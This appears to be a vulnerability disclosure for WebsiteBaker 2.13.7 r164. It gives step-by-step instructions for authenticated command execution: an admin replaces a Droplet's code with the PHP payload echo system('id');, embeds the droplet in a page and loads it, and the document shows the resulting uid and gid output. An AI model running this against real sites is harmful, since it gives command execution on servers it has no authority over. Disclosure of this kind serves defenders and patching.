# Exploit Title: WebsiteBaker  2.13.7 r164 Command Injection Authenticated
# Exploit Author: tmrswrr /Hulya KARABAG
# Vendor Homepage: https://forum.websitebaker.org/
# Software Link: https://www.softaculous.com/apps/cms/WebsiteBaker
# Version :  2.13.7 r164
# Date: 2025/8/10 


1. Log in with valid admin credentials.
2. Click Admin-Tools > droplets > RandomImage
Navigate to: https://127.0.0.1/WebsiteBaker/admin/admintools/tool.php
3. Remove all code in Edit a Droplet and insert payload, save it :
echo system('id');
4.Commandline to use: [[RandomImage?dir=subfolder_in_mediafolder]]
5. Go to modify page and add it : [[RandomImage?dir=subfolder_in_mediafolder]]
5. Open this page: 
Access: https://127.0.0.1/WebsiteBaker/pages/aaaaa.php
6. Verify Results
uid=1003(WebsiteBaker) gid=1004(WebsiteBaker) groups=1004(WebsiteBaker) uid=1003(WebsiteBaker) gid=1004(WebsiteBaker) groups=1004(WebsiteBaker)